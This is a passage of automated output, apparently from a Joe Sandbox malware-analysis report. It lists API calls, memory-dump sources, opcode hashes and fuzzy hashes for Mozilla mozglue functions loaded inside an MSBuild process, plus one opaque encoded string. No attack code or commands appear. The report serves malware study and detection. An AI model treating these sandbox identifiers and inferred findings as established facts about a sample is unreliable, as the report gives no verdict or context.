                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DA41E332B053168FCB25CE7C8E9076A76B0EB49B15F24053EE958E7B84D7B19C008BC0
                                                                                                                                                                                                                      Function 6C884DE0 Relevance: 7.6, APIs: 5, Instructions: 133stringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C884E5A
                                                                                                                                                                                                                      • ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C884E97
                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C884EE9
                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,00000000), ref: 6C884F02
                                                                                                                                                                                                                      • ?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?), ref: 6C884F1E
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: String$Double$Converter@double_conversion@@$Builder@2@@CreateRepresentation@$Ascii@DecimalDtoaExponentialMode@12@memcpystrlen
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 713647276-0
                                                                                                                                                                                                                      • Opcode ID: 38de2a42af88edd26cfcafb45cbfc204b440378f4681b8b79811da3d0b6906ab
                                                                                                                                                                                                                      • Instruction ID: f6d4cce00ed70916bdf7c815adc32dc66948fbf5ade1d09ff55d397bf45c1858
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 38de2a42af88edd26cfcafb45cbfc204b440378f4681b8b79811da3d0b6906ab
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4E41CE726097059FC721CF68C59095BBBE8BFC9354F108E2DF46697A41DB30E918CB91
                                                                                                                                                                                                                      Function 6C89C150 Relevance: 7.6, APIs: 5, Instructions: 110stringtimeCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C89C1BC
                                                                                                                                                                                                                      • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C89C1DC
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Now@Stamp@mozilla@@TimeV12@_strlen
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1885715127-0
                                                                                                                                                                                                                      • Opcode ID: 29df332d570adf5c4911972a0476508c5d1f4c7ee4c423370a2f047a03f28c00
                                                                                                                                                                                                                      • Instruction ID: 6c14f799f02cf429f0560fbaff747f30107021103e102028bfc27cf7f0bf6c0b
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 29df332d570adf5c4911972a0476508c5d1f4c7ee4c423370a2f047a03f28c00
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EC41A4719087408FD720DFA8D68079AB7F4AF9A308F51896DE8989B712E731D548CB93
                                                                                                                                                                                                                      Function 6C8E6180 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 107COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000024), ref: 6C8E61DD
                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,00000024,-00000070), ref: 6C8E622C
                                                                                                                                                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001), ref: 6C8E6250
                                                                                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C8E6292
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • 0pFJQUJRS470hoAQ0fjS0negYhpD/KnUnSgYhpMUvaiiwxuMGg+ppTSUDA0nSloxjtQCGk0HnNB/Sg8ZoKEpKU9aKAG9KOtKfrRQMbjiiiigaA9KTNL/WigYmMCkINOpO9ADTntR27UucmkNAwBpKXHPNGKBif54pKXH/6qO1ACUlKeOtFAxPajPBo7UUAJ15oIpcD3o6etACH86OKD1o/KgYlJml7Uf54oGHpSY9qX6UZoAbmjFL2pKADv6UgFKPrRi, xrefs: 6C8E619D
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: malloc$freememcpy
                                                                                                                                                                                                                      • String ID: 0pFJQUJRS470hoAQ0fjS0negYhpD/KnUnSgYhpMUvaiiwxuMGg+ppTSUDA0nSloxjtQCGk0HnNB/Sg8ZoKEpKU9aKAG9KOtKfrRQMbjiiiigaA9KTNL/WigYmMCkINOpO9ADTntR27UucmkNAwBpKXHPNGKBif54pKXH/6qO1ACUlKeOtFAxPajPBo7UUAJ15oIpcD3o6etACH86OKD1o/KgYlJml7Uf54oGHpSY9qX6UZoAbmjFL2pKADv6UgFKPrRi
                                                                                                                                                                                                                      • API String ID: 4259248891-450914710
                                                                                                                                                                                                                      • Opcode ID: 376dd6a70be2f3a422908fcf7d22f987fdea85df7be5b80e695af35d6ff4bc01
                                                                                                                                                                                                                      • Instruction ID: 2409b8fb97a5a5262a8f4b3a435fb46846519d354c14175fc7c01af06209ac6c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 376dd6a70be2f3a422908fcf7d22f987fdea85df7be5b80e695af35d6ff4bc01
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 55310871A0460E8FDB14CF2CD9806AA73E9FF5A308F10893DC55AD7651EB31E558C751
                                                                                                                                                                                                                      Function 6C8EA820 Relevance: 7.6, APIs: 5, Instructions: 106stringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(6C90F770), ref: 6C8EA858
                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C8EA87B
                                                                                                                                                                                                                        • Part of subcall function 6C8EA9D0: memcpy.VCRUNTIME140(?,?,00000400,?,?,?,6C8EA88F,00000000), ref: 6C8EA9F1
                                                                                                                                                                                                                      • _ltoa_s.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,00000020,0000000A), ref: 6C8EA8FF
                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C8EA90C
                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(6C90F770), ref: 6C8EA97E
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CriticalSectionstrlen$EnterLeave_ltoa_smemcpy
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1355178011-0
                                                                                                                                                                                                                      • Opcode ID: 80d12d975b7eac08b700fd2ae6e674a3acf956a47506baa746cb963334e5053c
                                                                                                                                                                                                                      • Instruction ID: 749305edb93df12afd4fe8981a38eee7b9abd59da63feff125dd81b6cad34834
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 80d12d975b7eac08b700fd2ae6e674a3acf956a47506baa746cb963334e5053c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FA41B5B1E002048FDB10DFA8C845BDEBB71FF09724F108A29E825AB781D771E945CB91
                                                                                                                                                                                                                      Function 6C891530 Relevance: 7.6, APIs: 5, Instructions: 98COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE(-00000002,?,6C89152B,?,?,?,?,6C891248,?), ref: 6C89159C
                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000023,?,?,?,?,6C89152B,?,?,?,?,6C891248,?), ref: 6C8915BC
                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE(-00000001,?,6C89152B,?,?,?,?,6C891248,?), ref: 6C8915E7
                                                                                                                                                                                                                      • free.MOZGLUE(?,?,?,?,?,?,6C89152B,?,?,?,?,6C891248,?), ref: 6C891606
                                                                                                                                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,6C89152B,?,?,?,?,6C891248,?), ref: 6C891637
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: moz_xmalloc$_invalid_parameter_noinfo_noreturnfreememcpy
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 733145618-0
                                                                                                                                                                                                                      • Opcode ID: d26ee7c3bda6ea49e2e057a32027e1ed7e79044bb3c1cddbfdb681a2ff705cca
                                                                                                                                                                                                                      • Instruction ID: c36fb88f4829606ea8c4587c97d059722ac49a774b46232594920cb0311e72f9
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d26ee7c3bda6ea49e2e057a32027e1ed7e79044bb3c1cddbfdb681a2ff705cca
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6131D672A085148BC7289E7CDA9046E77ADAB813647250F3DE423DBBD4EB30D9158791
                                                                                                                                                                                                                      Function 6C8EAD70 Relevance: 7.6, APIs: 5, Instructions: 93COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE(00000000,?,00000000,?,?,6C8FE330,?,6C8AC059), ref: 6C8EAD9D
                                                                                                                                                                                                                        • Part of subcall function 6C89CA10: malloc.MOZGLUE(?), ref: 6C89CA26
                                                                                                                                                                                                                      • memset.VCRUNTIME140(00000000,00000000,00000000,00000000,?,?,6C8FE330,?,6C8AC059), ref: 6C8EADAC
                                                                                                                                                                                                                      • free.MOZGLUE(?,?,?,?,00000000,?,?,6C8FE330,?,6C8AC059), ref: 6C8EAE01
                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00000000,?,?,6C8FE330,?,6C8AC059), ref: 6C8EAE1D
                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00000000,00000000,00000000,?,?,?,00000000,?,?,6C8FE330,?,6C8AC059), ref: 6C8EAE3D
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ErrorLast$freemallocmemsetmoz_xmalloc
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3161513745-0
                                                                                                                                                                                                                      • Opcode ID: 15e6c8ec59c5b0a86dd04f8e5a1a2aa42442ed8c0c834ab5cad5705c43241870
                                                                                                                                                                                                                      • Instruction ID: bb164e653f63855c36c578e1606e089ecfe801cc8e0f5a86d7fda925b5e09996
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 15e6c8ec59c5b0a86dd04f8e5a1a2aa42442ed8c0c834ab5cad5705c43241870
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8C315EB1A002159FDB20DF798D44AABBBF8EF49654F15883DE85AD7700E734E804CBA4
                                                                                                                                                                                                                      Function 6C8E5EF0 Relevance: 7.6, APIs: 5, Instructions: 89COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • ?_Ipfx@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE_N_N@Z.MSVCP140(00000001,00000000,6C8FDCA0,?,?,?,6C8BE8B5,00000000), ref: 6C8E5F1F
                                                                                                                                                                                                                      • ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,6C8BE8B5,00000000), ref: 6C8E5F4B
                                                                                                                                                                                                                      • ?snextc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(00000000,?,6C8BE8B5,00000000), ref: 6C8E5F7B
                                                                                                                                                                                                                      • ?clear@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(6E65475B,00000000,?,6C8BE8B5,00000000), ref: 6C8E5F9F
                                                                                                                                                                                                                      • ?sbumpc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,6C8BE8B5,00000000), ref: 6C8E5FD6
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: D@std@@@std@@U?$char_traits@$?clear@?$basic_ios@?sbumpc@?$basic_streambuf@?sgetc@?$basic_streambuf@?snextc@?$basic_streambuf@Ipfx@?$basic_istream@
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1389714915-0
                                                                                                                                                                                                                      • Opcode ID: 434876e4de6aeb3c633cf648c70f7588b460820d7a9c82f25409121bb3211772
                                                                                                                                                                                                                      • Instruction ID: 468024f3175cf9300accbdbfa1632b436b665220d46513796bc5a4737f0d87f1
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 434876e4de6aeb3c633cf648c70f7588b460820d7a9c82f25409121bb3211772
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9C31FA343046008FD724CF29C998E2AB7F9FF8A319B644958F5568BB95CB31EC41CB80
                                                                                                                                                                                                                      Function 6C88B4C0 Relevance: 7.6, APIs: 5, Instructions: 84COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 6C88B532
                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE(?), ref: 6C88B55B
                                                                                                                                                                                                                      • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C88B56B
                                                                                                                                                                                                                      • wcsncpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?), ref: 6C88B57E
                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C88B58F
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: HandleModulefreememsetmoz_xmallocwcsncpy_s
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 4244350000-0
                                                                                                                                                                                                                      • Opcode ID: 56f9414c86b1f2791069029931049de425e1711084422c78bc4abe8e04dd9abe
                                                                                                                                                                                                                      • Instruction ID: 2d01a4d0f36064498469ee113af75552fcbce37a9f9ecfd1665069b288d118ed
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 56f9414c86b1f2791069029931049de425e1711084422c78bc4abe8e04dd9abe
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5821F671A012059BDB108FA8CD40BBABBB9FF86314F28446DE818DB781E776D911C7A1
                                                                                                                                                                                                                      Function 6C88B7A0 Relevance: 7.6, APIs: 5, Instructions: 77COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • ?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(?,?), ref: 6C88B7CF
                                                                                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?), ref: 6C88B808
                                                                                                                                                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?), ref: 6C88B82C
                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C88B840
                                                                                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C88B849
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: free$?vprint@PrintfTarget@mozilla@@mallocmemcpy
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1977084945-0
                                                                                                                                                                                                                      • Opcode ID: df26535c82ae88f67fed615470afd8bf9c80089987047783f379933336dfdf53
                                                                                                                                                                                                                      • Instruction ID: 2ee53ca004032d949ed23951dbac59a4a9589430ce2833ff72055ba091c0dbb0
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: df26535c82ae88f67fed615470afd8bf9c80089987047783f379933336dfdf53
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E0218BB0E002199FDF10DFA9C9845FEBBB4EF49354F148529EC15A7741E731A944CBA1
                                                                                                                                                                                                                      Function 6C8E6E50 Relevance: 7.6, APIs: 5, Instructions: 72COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • MozDescribeCodeAddress.MOZGLUE(?,?), ref: 6C8E6E78
                                                                                                                                                                                                                        • Part of subcall function 6C8E6A10: InitializeCriticalSection.KERNEL32(6C90F618), ref: 6C8E6A68
                                                                                                                                                                                                                        • Part of subcall function 6C8E6A10: GetCurrentProcess.KERNEL32 ref: 6C8E6A7D
                                                                                                                                                                                                                        • Part of subcall function 6C8E6A10: GetCurrentProcess.KERNEL32 ref: 6C8E6AA1
                                                                                                                                                                                                                        • Part of subcall function 6C8E6A10: EnterCriticalSection.KERNEL32(6C90F618), ref: 6C8E6AAE
                                                                                                                                                                                                                        • Part of subcall function 6C8E6A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6C8E6AE1
                                                                                                                                                                                                                        • Part of subcall function 6C8E6A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6C8E6B15
                                                                                                                                                                                                                        • Part of subcall function 6C8E6A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100,?,?), ref: 6C8E6B65
                                                                                                                                                                                                                        • Part of subcall function 6C8E6A10: LeaveCriticalSection.KERNEL32(6C90F618,?,?), ref: 6C8E6B83
                                                                                                                                                                                                                      • MozFormatCodeAddress.MOZGLUE ref: 6C8E6EC1
                                                                                                                                                                                                                      • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6C8E6EE1
                                                                                                                                                                                                                      • _fileno.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6C8E6EED
                                                                                                                                                                                                                      • _write.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000400), ref: 6C8E6EFF
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CriticalSectionstrncpy$AddressCodeCurrentProcess$DescribeEnterFormatInitializeLeave_fileno_writefflush
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 4058739482-0
                                                                                                                                                                                                                      • Opcode ID: 17c9437fd180d29e486689e9930937240e3b5b0228c336947d50a5b942b56262
                                                                                                                                                                                                                      • Instruction ID: 1acb0d86a58d72f1f5b7e32a6198284eb24706e0c97845387ae6c00a67af85f9
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 17c9437fd180d29e486689e9930937240e3b5b0228c336947d50a5b942b56262
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6721C1B1A0821E8FDB10CF69D98469E77F4EF89308F04443DE90997341EB709A588F92
                                                                                                                                                                                                                      Function 6C8E76C0 Relevance: 7.6, APIs: 5, Instructions: 64COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32 ref: 6C8E76F2
                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE(00000001), ref: 6C8E7705
                                                                                                                                                                                                                        • Part of subcall function 6C89CA10: malloc.MOZGLUE(?), ref: 6C89CA26
                                                                                                                                                                                                                      • memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C8E7717
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,6C8E778F,00000000,00000000,00000000,00000000), ref: 6C8E7731
                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C8E7760
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ByteCharMultiWide$freemallocmemsetmoz_xmalloc
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2538299546-0
                                                                                                                                                                                                                      • Opcode ID: 31b5bb65ffc16f04850917ba0ff4b34fb32aa51f6066bf5b90757c748c938cc8
                                                                                                                                                                                                                      • Instruction ID: 6de3275eda753eaceb3ab1d9d85ef26b602b9c511f0bdf75970844820dbee117
